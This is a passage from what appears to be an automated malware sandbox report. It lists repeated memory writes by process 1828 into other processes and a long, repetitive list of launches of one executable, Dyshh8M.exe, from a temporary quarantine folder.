PID 1828 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1828 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

